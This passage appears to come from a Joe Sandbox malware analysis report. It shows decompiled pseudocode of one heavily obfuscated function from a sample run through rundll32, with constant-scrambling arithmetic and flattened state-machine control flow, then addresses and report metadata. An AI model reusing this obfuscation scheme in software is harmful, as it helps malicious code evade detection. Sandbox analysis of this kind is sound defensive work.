                                                                                                                      				_v196 = _v196 ^ 0x000054ad;
                                                                                                                      				_v244 = 0xbebf62;
                                                                                                                      				_v244 = _v244 << 0xb;
                                                                                                                      				_v244 = _v244 + 0xffffca16;
                                                                                                                      				_v244 = _v244 << 0xe;
                                                                                                                      				_v244 = _v244 ^ 0x36858000;
                                                                                                                      				_v72 = 0x750de5;
                                                                                                                      				_v72 = _v72 | 0xb336b270;
                                                                                                                      				_v72 = _v72 ^ 0xb377bff5;
                                                                                                                      				_v256 = 0xc175fb;
                                                                                                                      				_t984 = 0x72;
                                                                                                                      				_t959 = 0x28;
                                                                                                                      				_v256 = _v256 * 0x26;
                                                                                                                      				_v256 = _v256 >> 5;
                                                                                                                      				_v256 = _v256 ^ 0xfb5a89da;
                                                                                                                      				_v256 = _v256 ^ 0xfbbf3581;
                                                                                                                      				_v76 = 0x1a7820;
                                                                                                                      				_v76 = _v76 | 0xb8d3f172;
                                                                                                                      				_v76 = _v76 ^ 0xb8dbf96d;
                                                                                                                      				_v224 = 0x97ff87;
                                                                                                                      				_v224 = _v224 / _t984;
                                                                                                                      				_v224 = _v224 >> 6;
                                                                                                                      				_v224 = _v224 * 0x5d;
                                                                                                                      				_v224 = _v224 ^ 0x0001effe;
                                                                                                                      				_v40 = 0x7c0450;
                                                                                                                      				_v40 = _v40 / _t959;
                                                                                                                      				_v40 = _v40 ^ 0x000319b6;
                                                                                                                      				_v136 = 0x260fad;
                                                                                                                      				_v136 = _v136 + 0x622a;
                                                                                                                      				_t960 = 0x1c;
                                                                                                                      				_v136 = _v136 / _t960;
                                                                                                                      				_v136 = _v136 ^ 0x00015e7e;
                                                                                                                      				_v288 = 0x61f743;
                                                                                                                      				_t961 = 0x66;
                                                                                                                      				_v288 = _v288 * 0x25;
                                                                                                                      				_v288 = _v288 ^ 0x0e2ee817;
                                                                                                                      				_v288 = 0x858eca;
                                                                                                                      				_v288 = _v288 / _t984;
                                                                                                                      				_v288 = _v288 ^ 0x0002de1a;
                                                                                                                      				_v280 = 0xcba1b8;
                                                                                                                      				_v280 = _v280 / _t961;
                                                                                                                      				_v280 = _v280 ^ 0xc2211053;
                                                                                                                      				_v280 = _v280 + 0xffff75b7;
                                                                                                                      				_v280 = _v280 ^ 0xc2279606;
                                                                                                                      				_v288 = 0x614b46;
                                                                                                                      				_v288 = _v288 >> 4;
                                                                                                                      				_v288 = _v288 ^ 0x000cf9c3;
                                                                                                                      				_v288 = 0x794624;
                                                                                                                      				_v288 = _v288 + 0xb4d0;
                                                                                                                      				_v288 = _v288 ^ 0x0072cd5b;
                                                                                                                      				_v288 = 0xcdbe83;
                                                                                                                      				_v288 = _v288 >> 0xf;
                                                                                                                      				_v288 = _v288 ^ 0x00034ad6;
                                                                                                                      				_v288 = 0x24639d;
                                                                                                                      				_t962 = 0x28;
                                                                                                                      				_v288 = _v288 / _t962;
                                                                                                                      				_v288 = _v288 ^ 0x000e4507;
                                                                                                                      				_v288 = 0x4730ec;
                                                                                                                      				_t963 = 0x21;
                                                                                                                      				_v288 = _v288 / _t963;
                                                                                                                      				_v288 = _v288 ^ 0x0002fb4b;
                                                                                                                      				_v284 = 0xb301d9;
                                                                                                                      				_t964 = 0x4e;
                                                                                                                      				_v284 = _v284 / _t964;
                                                                                                                      				_v284 = _v284 + 0x8c1d;
                                                                                                                      				_v284 = _v284 ^ 0x00061f34;
                                                                                                                      				_v280 = 0xfdcbf7;
                                                                                                                      				_v280 = _v280 + 0x27a;
                                                                                                                      				_v280 = _v280 + 0xffff891b;
                                                                                                                      				_t965 = 0x46;
                                                                                                                      				_v280 = _v280 / _t965;
                                                                                                                      				_v280 = _v280 ^ 0x0008575c;
                                                                                                                      				_v284 = 0xc1d3a0;
                                                                                                                      				_v284 = _v284 >> 0xc;
                                                                                                                      				_v284 = _v284 << 2;
                                                                                                                      				_v284 = _v284 ^ 0x000b0f76;
                                                                                                                      				_v112 = 0xeee25;
                                                                                                                      				_v112 = _v112 << 0xc;
                                                                                                                      				_v112 = _v112 << 4;
                                                                                                                      				_v112 = _v112 ^ 0xee2c14e7;
                                                                                                                      				_v180 = 0x8a49b3;
                                                                                                                      				_v180 = _v180 | 0xb0d6dc69;
                                                                                                                      				_v180 = _v180 + 0xffffa02a;
                                                                                                                      				_v180 = _v180 | 0x7fd27f38;
                                                                                                                      				_v180 = _v180 ^ 0xffd81443;
                                                                                                                      				_v152 = 0x628374;
                                                                                                                      				_v152 = _v152 >> 2;
                                                                                                                      				_v152 = _v152 + 0xffff73d9;
                                                                                                                      				_t966 = 0x2e;
                                                                                                                      				_v152 = _v152 / _t966;
                                                                                                                      				_v152 = _v152 ^ 0x0001ef4a;
                                                                                                                      				_v28 = 0xe4a1af;
                                                                                                                      				_v28 = _v28 + 0x32bc;
                                                                                                                      				_v28 = _v28 ^ 0x00ec33da;
                                                                                                                      				_v160 = 0x595a50;
                                                                                                                      				_v160 = _v160 + 0xffffdbfa;
                                                                                                                      				_v160 = _v160 + 0xffffb344;
                                                                                                                      				_t967 = 0x36;
                                                                                                                      				_v160 = _v160 / _t967;
                                                                                                                      				_v160 = _v160 ^ 0x0006861f;
                                                                                                                      				_v88 = 0x4d7ad3;
                                                                                                                      				_v88 = _v88 + 0xc28a;
                                                                                                                      				_v88 = _v88 ^ 0x004ca34c;
                                                                                                                      				_v48 = 0xf1782b;
                                                                                                                      				_v48 = _v48 ^ 0xe8a77c51;
                                                                                                                      				_v48 = _v48 ^ 0xe85593aa;
                                                                                                                      				_v100 = 0x42ea8e;
                                                                                                                      				_t985 = 0x2a;
                                                                                                                      				_v100 = _v100 / _t985;
                                                                                                                      				_v100 = _v100 ^ 0x000caa85;
                                                                                                                      				_v148 = 0xa48e68;
                                                                                                                      				_t968 = 6;
                                                                                                                      				_v148 = _v148 / _t968;
                                                                                                                      				_v148 = _v148 << 0xc;
                                                                                                                      				_v148 = _v148 ^ 0xb6d58e9e;
                                                                                                                      				_v252 = 0x4ff2e7;
                                                                                                                      				_t969 = 0xc;
                                                                                                                      				_v252 = _v252 / _t969;
                                                                                                                      				_v252 = _v252 << 6;
                                                                                                                      				_v252 = _v252 << 0xc;
                                                                                                                      				_v252 = _v252 ^ 0xa6466867;
                                                                                                                      				_v80 = 0x4d7637;
                                                                                                                      				_v80 = _v80 + 0xd199;
                                                                                                                      				_v80 = _v80 ^ 0x004dfa45;
                                                                                                                      				_v24 = 0xfee4b3;
                                                                                                                      				_t970 = 0x3e;
                                                                                                                      				_v24 = _v24 * 0x23;
                                                                                                                      				_v24 = _v24 ^ 0x22d37c34;
                                                                                                                      				_v204 = 0x24209;
                                                                                                                      				_v204 = _v204 + 0xffffcebc;
                                                                                                                      				_v204 = _v204 ^ 0x847f2e61;
                                                                                                                      				_v204 = _v204 + 0xffff5302;
                                                                                                                      				_v204 = _v204 ^ 0x847f4f7c;
                                                                                                                      				_v260 = 0x4a587;
                                                                                                                      				_v260 = _v260 * 0x4a;
                                                                                                                      				_v260 = _v260 + 0xffff9bf3;
                                                                                                                      				_v260 = _v260 + 0xffff92e5;
                                                                                                                      				_v260 = _v260 ^ 0x015b504d;
                                                                                                                      				_v164 = 0x6d05db;
                                                                                                                      				_v164 = _v164 * 0x14;
                                                                                                                      				_v164 = _v164 >> 4;
                                                                                                                      				_v164 = _v164 ^ 0x556abaa4;
                                                                                                                      				_v164 = _v164 ^ 0x55e01079;
                                                                                                                      				_v20 = 0x80cc5b;
                                                                                                                      				_v20 = _v20 >> 0xd;
                                                                                                                      				_v20 = _v20 ^ 0x000efc86;
                                                                                                                      				_v104 = 0xc8e6e2;
                                                                                                                      				_v104 = _v104 << 8;
                                                                                                                      				_v104 = _v104 >> 0x10;
                                                                                                                      				_v104 = _v104 ^ 0x000afff3;
                                                                                                                      				_v272 = 0x560e69;
                                                                                                                      				_v272 = _v272 + 0x2793;
                                                                                                                      				_v272 = _v272 * 0xe;
                                                                                                                      				_v272 = _v272 + 0xc902;
                                                                                                                      				_v272 = _v272 ^ 0x04bc6edc;
                                                                                                                      				_v16 = 0xfcaf67;
                                                                                                                      				_v16 = _v16 / _t970;
                                                                                                                      				_v16 = _v16 ^ 0x000c0ba9;
                                                                                                                      				_v56 = 0x81a14f;
                                                                                                                      				_v56 = _v56 >> 0xb;
                                                                                                                      				_v56 = _v56 ^ 0x000fb9cd;
                                                                                                                      				_v32 = 0x24333c;
                                                                                                                      				_v32 = _v32 / _t985;
                                                                                                                      				_v32 = _v32 ^ 0x00065bee;
                                                                                                                      				_v124 = 0xe3a445;
                                                                                                                      				_v124 = _v124 >> 5;
                                                                                                                      				_v124 = _v124 >> 7;
                                                                                                                      				_v124 = _v124 ^ 0x0000dfdf;
                                                                                                                      				_v220 = 0x5f21d9;
                                                                                                                      				_t971 = 0x79;
                                                                                                                      				_v220 = _v220 * 0x54;
                                                                                                                      				_v220 = _v220 << 5;
                                                                                                                      				_v220 = _v220 ^ 0x0e372a7b;
                                                                                                                      				_v220 = _v220 ^ 0xe8dc9c41;
                                                                                                                      				_v188 = 0xc44d01;
                                                                                                                      				_v188 = _v188 ^ 0x0373dd04;
                                                                                                                      				_v188 = _v188 * 0x30;
                                                                                                                      				_v188 = _v188 ^ 0xfb03bbf0;
                                                                                                                      				_v188 = _v188 ^ 0x496460ca;
                                                                                                                      				_v268 = 0x8213af;
                                                                                                                      				_v268 = _v268 ^ 0x6d9501b2;
                                                                                                                      				_v268 = _v268 | 0x4d165578;
                                                                                                                      				_v268 = _v268 >> 4;
                                                                                                                      				_v268 = _v268 ^ 0x06d55fab;
                                                                                                                      				_v212 = 0x705526;
                                                                                                                      				_v212 = _v212 >> 0xa;
                                                                                                                      				_v212 = _v212 << 9;
                                                                                                                      				_v212 = _v212 >> 8;
                                                                                                                      				_v212 = _v212 ^ 0x000b72c4;
                                                                                                                      				_v92 = 0xc8093b;
                                                                                                                      				_v92 = _v92 + 0xd043;
                                                                                                                      				_v92 = _v92 ^ 0x00ca3bde;
                                                                                                                      				_v264 = 0x1f9619;
                                                                                                                      				_v264 = _v264 + 0xffffbc34;
                                                                                                                      				_v264 = _v264 * 0x3e;
                                                                                                                      				_v264 = _v264 * 0x52;
                                                                                                                      				_v264 = _v264 ^ 0x6e0edc82;
                                                                                                                      				_v96 = 0x6d9960;
                                                                                                                      				_v96 = _v96 | 0x9fb7a8f9;
                                                                                                                      				_v96 = _v96 ^ 0x9ff35e32;
                                                                                                                      				_v144 = 0x447df2;
                                                                                                                      				_v144 = _v144 << 8;
                                                                                                                      				_v144 = _v144 + 0xffff6cb2;
                                                                                                                      				_v144 = _v144 ^ 0x44714589;
                                                                                                                      				_v240 = 0x65db08;
                                                                                                                      				_v240 = _v240 * 6;
                                                                                                                      				_v240 = _v240 + 0x5f97;
                                                                                                                      				_v240 = _v240 >> 0xd;
                                                                                                                      				_v240 = _v240 ^ 0x000293b4;
                                                                                                                      				_v84 = 0x3c7c20;
                                                                                                                      				_v84 = _v84 ^ 0x2c3d49c2;
                                                                                                                      				_v84 = _v84 ^ 0x2c080053;
                                                                                                                      				_v248 = 0x13c85;
                                                                                                                      				_v248 = _v248 + 0x8cd8;
                                                                                                                      				_v248 = _v248 + 0x6e3d;
                                                                                                                      				_v248 = _v248 ^ 0xe59eace5;
                                                                                                                      				_v248 = _v248 ^ 0xe5984999;
                                                                                                                      				_v216 = 0x6164ef;
                                                                                                                      				_v216 = _v216 << 6;
                                                                                                                      				_v216 = _v216 + 0xffff2edc;
                                                                                                                      				_v216 = _v216 | 0xa66c888f;
                                                                                                                      				_v216 = _v216 ^ 0xbe7947d5;
                                                                                                                      				_v232 = 0x991e82;
                                                                                                                      				_v232 = _v232 + 0xffff48fb;
                                                                                                                      				_v232 = _v232 >> 0xe;
                                                                                                                      				_v232 = _v232 | 0x69e4ac2c;
                                                                                                                      				_v232 = _v232 ^ 0x69ef7d1b;
                                                                                                                      				_v68 = 0x9d94b2;
                                                                                                                      				_v68 = _v68 | 0xcead792c;
                                                                                                                      				_v68 = _v68 ^ 0xceb9e800;
                                                                                                                      				_v44 = 0x20071e;
                                                                                                                      				_v44 = _v44 / _t971;
                                                                                                                      				_v44 = _v44 ^ 0x000a654c;
                                                                                                                      				_v128 = 0x223cb7;
                                                                                                                      				_v128 = _v128 + 0x9bf0;
                                                                                                                      				_v128 = _v128 | 0x79b7d361;
                                                                                                                      				_v128 = _v128 ^ 0x79b3b147;
                                                                                                                      				_v52 = 0x8ed203;
                                                                                                                      				_v52 = _v52 + 0xffff1a7b;
                                                                                                                      				_v52 = _v52 ^ 0x008be8c4;
                                                                                                                      				_v208 = 0xe0ac17;
                                                                                                                      				_v208 = _v208 ^ 0xbcfe8cf2;
                                                                                                                      				_t972 = 0x6b;
                                                                                                                      				_v208 = _v208 / _t972;
                                                                                                                      				_v208 = _v208 | 0x3ee9ec5f;
                                                                                                                      				_v208 = _v208 ^ 0x3fec9c1d;
                                                                                                                      				_v192 = 0x219bfa;
                                                                                                                      				_v192 = _v192 >> 4;
                                                                                                                      				_v192 = _v192 + 0x77e4;
                                                                                                                      				_v192 = _v192 | 0x2fb4141c;
                                                                                                                      				_v192 = _v192 ^ 0x2fb2076e;
                                                                                                                      				_v200 = 0x8926e2;
                                                                                                                      				_v200 = _v200 << 4;
                                                                                                                      				_t973 = 0xc;
                                                                                                                      				_v200 = _v200 / _t973;
                                                                                                                      				_v200 = _v200 + 0xffff5704;
                                                                                                                      				_v200 = _v200 ^ 0x00bbfbcc;
                                                                                                                      				_v284 = 0xaed0cb;
                                                                                                                      				_v284 = _v284 + 0x9c17;
                                                                                                                      				_v284 = _v284 + 0xaf6d;
                                                                                                                      				_v284 = _v284 ^ 0x00b89bc1;
                                                                                                                      				_v168 = 0x914ce9;
                                                                                                                      				_v168 = _v168 | 0xceb3d4af;
                                                                                                                      				_v168 = _v168 ^ 0x5adaba1c;
                                                                                                                      				_v168 = _v168 ^ 0x3c292fbf;
                                                                                                                      				_v168 = _v168 ^ 0xa84ea968;
                                                                                                                      				_v156 = 0x90c891;
                                                                                                                      				_v156 = _v156 + 0xffff3667;
                                                                                                                      				_t974 = 0x5c;
                                                                                                                      				_v156 = _v156 / _t974;
                                                                                                                      				_t975 = 0x3c;
                                                                                                                      				_v156 = _v156 / _t975;
                                                                                                                      				_v156 = _v156 ^ 0x000da682;
                                                                                                                      				_v140 = 0xffcb83;
                                                                                                                      				_v140 = _v140 << 0xd;
                                                                                                                      				_v140 = _v140 | 0xcebab625;
                                                                                                                      				_v140 = _v140 ^ 0xfff71570;
                                                                                                                      				_v280 = 0xfef1ee;
                                                                                                                      				_v280 = _v280 >> 8;
                                                                                                                      				_v280 = _v280 + 0xffff306e;
                                                                                                                      				_v280 = _v280 | 0x3331510b;
                                                                                                                      				_v280 = _v280 ^ 0x3338227a;
                                                                                                                      				_v176 = 0xc7331d;
                                                                                                                      				_v176 = _v176 >> 7;
                                                                                                                      				_v176 = _v176 + 0x1d50;
                                                                                                                      				_v176 = _v176 << 5;
                                                                                                                      				_v176 = _v176 ^ 0x00370898;
                                                                                                                      				_v288 = 0x519041;
                                                                                                                      				_v288 = _v288 + 0x7cd9;
                                                                                                                      				_v288 = _v288 ^ 0x0057f5a9;
                                                                                                                      				_t976 = _v12;
                                                                                                                      				_t986 = _v12;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t939 = 0x68a9e90;
                                                                                                                      					while(1) {
                                                                                                                      						_t823 = _v184;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t991 = _t977 - _t939;
                                                                                                                      							if(_t991 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t991 == 0) {
                                                                                                                      								__eflags =  *_v8;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_push(_v104);
                                                                                                                      									_push(_v20);
                                                                                                                      									_t868 = E0069DCF7(_v164, 0x681524, __eflags);
                                                                                                                      									_v276 = _t868;
                                                                                                                      								}
                                                                                                                      								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
                                                                                                                      								_t981 = _a44 & 1;
                                                                                                                      								__eflags = _t981;
                                                                                                                      								if(_t981 != 0) {
                                                                                                                      									__eflags = _t845;
                                                                                                                      								}
                                                                                                                      								_push(_t868);
                                                                                                                      								_t976 = E006875FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
                                                                                                                      								E0068A8B0(_v268, _v276, _v212);
                                                                                                                      								_t988 =  &(_t988[0xe]);
                                                                                                                      								__eflags = _t976;
                                                                                                                      								if(_t976 == 0) {
                                                                                                                      									_t977 = 0x51daea9;
                                                                                                                      								} else {
                                                                                                                      									_push(_v96);
                                                                                                                      									_push(_v264);
                                                                                                                      									_push(_v256);
                                                                                                                      									_v60 = 1;
                                                                                                                      									_push( &_v60);
                                                                                                                      									_push(_v92);
                                                                                                                      									_t948 = 4;
                                                                                                                      									E00689670(_t976, _t948);
                                                                                                                      									_t988 =  &(_t988[5]);
                                                                                                                      									__eflags = _t981;
                                                                                                                      									if(_t981 != 0) {
                                                                                                                      										E0069408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
                                                                                                                      										_t732 =  &_v60;
                                                                                                                      										 *_t732 = _v60 | _v136;
                                                                                                                      										__eflags =  *_t732;
                                                                                                                      										E00689670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
                                                                                                                      										_t988 =  &(_t988[0xb]);
                                                                                                                      									}
                                                                                                                      									_t977 = 0xbee37f5;
                                                                                                                      								}
                                                                                                                      								L11:
                                                                                                                      								_t868 = _v276;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							if(_t977 == 0x2602436) {
                                                                                                                      								_t977 = 0x506ebc3;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t977 == 0x329d839) {
                                                                                                                      								_t977 = 0x2602436;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t977 == 0x4bb42fe) {
                                                                                                                      								_t823 = E006888C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
                                                                                                                      								_t868 = _v276;
                                                                                                                      								_t988 =  &(_t988[0xd]);
                                                                                                                      								__eflags = _t823;
                                                                                                                      								_v184 = _t823;
                                                                                                                      								_t939 = 0x68a9e90;
                                                                                                                      								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t977 == 0x506ebc3) {
                                                                                                                      								_push(_t868);
                                                                                                                      								_push(_v72);
                                                                                                                      								_push(_v160);
                                                                                                                      								_push(_v28);
                                                                                                                      								_push(_v152);
                                                                                                                      								_t858 = E0069DAC6(_v112, _v180);
                                                                                                                      								_t986 = _t858;
                                                                                                                      								__eflags = _t858;
                                                                                                                      								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
                                                                                                                      								E00698519(_v88, _v48, 0);
                                                                                                                      								_t988 = _t988 - 0xc + 0x24;
                                                                                                                      								L37:
                                                                                                                      								_t868 = _v276;
                                                                                                                      								_t939 = 0x68a9e90;
                                                                                                                      								L38:
                                                                                                                      								__eflags = _t977 - 0xdf8c541;
                                                                                                                      								if(_t977 == 0xdf8c541) {
                                                                                                                      									L41:
                                                                                                                      									return _t862;
                                                                                                                      								}
                                                                                                                      								_t823 = _v184;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t977 != 0x51daea9) {
                                                                                                                      								goto L38;
                                                                                                                      							}
                                                                                                                      							E00682B62(_v168, _t823, _v156, _v140);
                                                                                                                      							_t977 = 0x9a35046;
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						__eflags = _t977 - 0x81a6b17;
                                                                                                                      						if(_t977 == 0x81a6b17) {
                                                                                                                      							E00682B62(_v192, _t976, _v200, _v284);
                                                                                                                      							_t977 = 0x51daea9;
                                                                                                                      							goto L37;
                                                                                                                      						}
                                                                                                                      						__eflags = _t977 - 0x9a35046;
                                                                                                                      						if(_t977 == 0x9a35046) {
                                                                                                                      							E00682B62(_v280, _t986, _v176, _v288);
                                                                                                                      							goto L41;
                                                                                                                      						}
                                                                                                                      						__eflags = _t977 - 0xb70b8d2;
                                                                                                                      						if(_t977 == 0xb70b8d2) {
                                                                                                                      							__eflags = E0069A2E8(_t976, _a4);
                                                                                                                      							_t977 = 0x81a6b17;
                                                                                                                      							_t829 = 1;
                                                                                                                      							_t862 =  !=  ? _t829 : _t862;
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						__eflags = _t977 - 0xba06d79;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							__eflags = E006A09B5(_t976, _v120, __eflags) - _v36;
                                                                                                                      							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						__eflags = _t977 - 0xbee37f5;
                                                                                                                      						if(_t977 != 0xbee37f5) {
                                                                                                                      							goto L38;
                                                                                                                      						}
                                                                                                                      						_t832 = _v8;
                                                                                                                      						_t888 =  *_t832;
                                                                                                                      						__eflags = _t888;
                                                                                                                      						if(_t888 == 0) {
                                                                                                                      							_t833 = 0;
                                                                                                                      							__eflags = 0;
                                                                                                                      						} else {
                                                                                                                      							_t833 = _t832[1];
                                                                                                                      						}
                                                                                                                      						E00682AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
                                                                                                                      						_t988 =  &(_t988[7]);
                                                                                                                      						asm("sbb esi, esi");
                                                                                                                      						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0069e74a
                                                                                                                      0x0069e752
                                                                                                                      0x0069e75a
                                                                                                                      0x0069e762
                                                                                                                      0x0069e767
                                                                                                                      0x0069e76f
                                                                                                                      0x0069e777
                                                                                                                      0x0069e77f
                                                                                                                      0x0069e787
                                                                                                                      0x0069e791
                                                                                                                      0x0069e796
                                                                                                                      0x0069e79e
                                                                                                                      0x0069e7ac
                                                                                                                      0x0069e7b1
                                                                                                                      0x0069e7b7
                                                                                                                      0x0069e7bf
                                                                                                                      0x0069e7cb
                                                                                                                      0x0069e7d0
                                                                                                                      0x0069e7d6
                                                                                                                      0x0069e7de
                                                                                                                      0x0069e7ea
                                                                                                                      0x0069e7ef
                                                                                                                      0x0069e7f5
                                                                                                                      0x0069e7fd
                                                                                                                      0x0069e805
                                                                                                                      0x0069e80d
                                                                                                                      0x0069e815
                                                                                                                      0x0069e821
                                                                                                                      0x0069e826
                                                                                                                      0x0069e82c
                                                                                                                      0x0069e834
                                                                                                                      0x0069e83c
                                                                                                                      0x0069e841
                                                                                                                      0x0069e846
                                                                                                                      0x0069e84e
                                                                                                                      0x0069e859
                                                                                                                      0x0069e861
                                                                                                                      0x0069e869
                                                                                                                      0x0069e874
                                                                                                                      0x0069e87f
                                                                                                                      0x0069e88a
                                                                                                                      0x0069e895
                                                                                                                      0x0069e8a0
                                                                                                                      0x0069e8ab
                                                                                                                      0x0069e8b6
                                                                                                                      0x0069e8be
                                                                                                                      0x0069e8d0
                                                                                                                      0x0069e8d5
                                                                                                                      0x0069e8de
                                                                                                                      0x0069e8e9
                                                                                                                      0x0069e8f4
                                                                                                                      0x0069e8ff
                                                                                                                      0x0069e90a
                                                                                                                      0x0069e915
                                                                                                                      0x0069e920
                                                                                                                      0x0069e932
                                                                                                                      0x0069e935
                                                                                                                      0x0069e93c
                                                                                                                      0x0069e947
                                                                                                                      0x0069e952
                                                                                                                      0x0069e95d
                                                                                                                      0x0069e968
                                                                                                                      0x0069e973
                                                                                                                      0x0069e97e
                                                                                                                      0x0069e989
                                                                                                                      0x0069e99f
                                                                                                                      0x0069e9a4
                                                                                                                      0x0069e9ab
                                                                                                                      0x0069e9b6
                                                                                                                      0x0069e9ca
                                                                                                                      0x0069e9cf
                                                                                                                      0x0069e9d6
                                                                                                                      0x0069e9de
                                                                                                                      0x0069e9e9
                                                                                                                      0x0069e9f7
                                                                                                                      0x0069e9fc
                                                                                                                      0x0069ea00
                                                                                                                      0x0069ea05
                                                                                                                      0x0069ea0a
                                                                                                                      0x0069ea12
                                                                                                                      0x0069ea1d
                                                                                                                      0x0069ea28
                                                                                                                      0x0069ea33
                                                                                                                      0x0069ea48
                                                                                                                      0x0069ea49
                                                                                                                      0x0069ea50
                                                                                                                      0x0069ea5b
                                                                                                                      0x0069ea63
                                                                                                                      0x0069ea6b
                                                                                                                      0x0069ea73
                                                                                                                      0x0069ea7b
                                                                                                                      0x0069ea83
                                                                                                                      0x0069ea90
                                                                                                                      0x0069ea94
                                                                                                                      0x0069ea9c
                                                                                                                      0x0069eaa4
                                                                                                                      0x0069eaac
                                                                                                                      0x0069eabf
                                                                                                                      0x0069eac6
                                                                                                                      0x0069eace
                                                                                                                      0x0069ead9
                                                                                                                      0x0069eae4
                                                                                                                      0x0069eaef
                                                                                                                      0x0069eaf7
                                                                                                                      0x0069eb02
                                                                                                                      0x0069eb0d
                                                                                                                      0x0069eb15
                                                                                                                      0x0069eb1d
                                                                                                                      0x0069eb28
                                                                                                                      0x0069eb30
                                                                                                                      0x0069eb3d
                                                                                                                      0x0069eb41
                                                                                                                      0x0069eb49
                                                                                                                      0x0069eb51
                                                                                                                      0x0069eb67
                                                                                                                      0x0069eb6e
                                                                                                                      0x0069eb79
                                                                                                                      0x0069eb84
                                                                                                                      0x0069eb8c
                                                                                                                      0x0069eb97
                                                                                                                      0x0069ebab
                                                                                                                      0x0069ebb2
                                                                                                                      0x0069ebbd
                                                                                                                      0x0069ebc8
                                                                                                                      0x0069ebd2
                                                                                                                      0x0069ebda
                                                                                                                      0x0069ebe5
                                                                                                                      0x0069ebf4
                                                                                                                      0x0069ebf5
                                                                                                                      0x0069ebf9
                                                                                                                      0x0069ebfe
                                                                                                                      0x0069ec06
                                                                                                                      0x0069ec0e
                                                                                                                      0x0069ec16
                                                                                                                      0x0069ec23
                                                                                                                      0x0069ec27
                                                                                                                      0x0069ec2f
                                                                                                                      0x0069ec37
                                                                                                                      0x0069ec3f
                                                                                                                      0x0069ec47
                                                                                                                      0x0069ec4f
                                                                                                                      0x0069ec54
                                                                                                                      0x0069ec5c
                                                                                                                      0x0069ec64
                                                                                                                      0x0069ec69
                                                                                                                      0x0069ec6e
                                                                                                                      0x0069ec73
                                                                                                                      0x0069ec7b
                                                                                                                      0x0069ec86
                                                                                                                      0x0069ec91
                                                                                                                      0x0069ec9c
                                                                                                                      0x0069eca4
                                                                                                                      0x0069ecb1
                                                                                                                      0x0069ecba
                                                                                                                      0x0069ecbe
                                                                                                                      0x0069ecc6
                                                                                                                      0x0069ecd1
                                                                                                                      0x0069ecdc
                                                                                                                      0x0069ece7
                                                                                                                      0x0069ecf2
                                                                                                                      0x0069ecfa
                                                                                                                      0x0069ed05
                                                                                                                      0x0069ed10
                                                                                                                      0x0069ed1d
                                                                                                                      0x0069ed21
                                                                                                                      0x0069ed29
                                                                                                                      0x0069ed2e
                                                                                                                      0x0069ed36
                                                                                                                      0x0069ed41
                                                                                                                      0x0069ed4c
                                                                                                                      0x0069ed57
                                                                                                                      0x0069ed5f
                                                                                                                      0x0069ed67
                                                                                                                      0x0069ed6f
                                                                                                                      0x0069ed77
                                                                                                                      0x0069ed7f
                                                                                                                      0x0069ed87
                                                                                                                      0x0069ed8c
                                                                                                                      0x0069ed94
                                                                                                                      0x0069ed9c
                                                                                                                      0x0069eda4
                                                                                                                      0x0069edac
                                                                                                                      0x0069edb4
                                                                                                                      0x0069edb9
                                                                                                                      0x0069edc1
                                                                                                                      0x0069edc9
                                                                                                                      0x0069edd4
                                                                                                                      0x0069eddf
                                                                                                                      0x0069edea
                                                                                                                      0x0069edfe
                                                                                                                      0x0069ee05
                                                                                                                      0x0069ee10
                                                                                                                      0x0069ee1b
                                                                                                                      0x0069ee26
                                                                                                                      0x0069ee31
                                                                                                                      0x0069ee3c
                                                                                                                      0x0069ee49
                                                                                                                      0x0069ee54
                                                                                                                      0x0069ee5f
                                                                                                                      0x0069ee67
                                                                                                                      0x0069ee75
                                                                                                                      0x0069ee7a
                                                                                                                      0x0069ee80
                                                                                                                      0x0069ee88
                                                                                                                      0x0069ee90
                                                                                                                      0x0069ee98
                                                                                                                      0x0069ee9d
                                                                                                                      0x0069eea5
                                                                                                                      0x0069eead
                                                                                                                      0x0069eeb5
                                                                                                                      0x0069eebd
                                                                                                                      0x0069eec6
                                                                                                                      0x0069eecb
                                                                                                                      0x0069eed1
                                                                                                                      0x0069eed9
                                                                                                                      0x0069eee1
                                                                                                                      0x0069eee9

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                      • API String ID: 0-3417817227
                                                                                                                      • Opcode ID: 613e668a931c6fe6e00fc100f24d35d5e931325cbcc48035c2cd1239f6ae4419
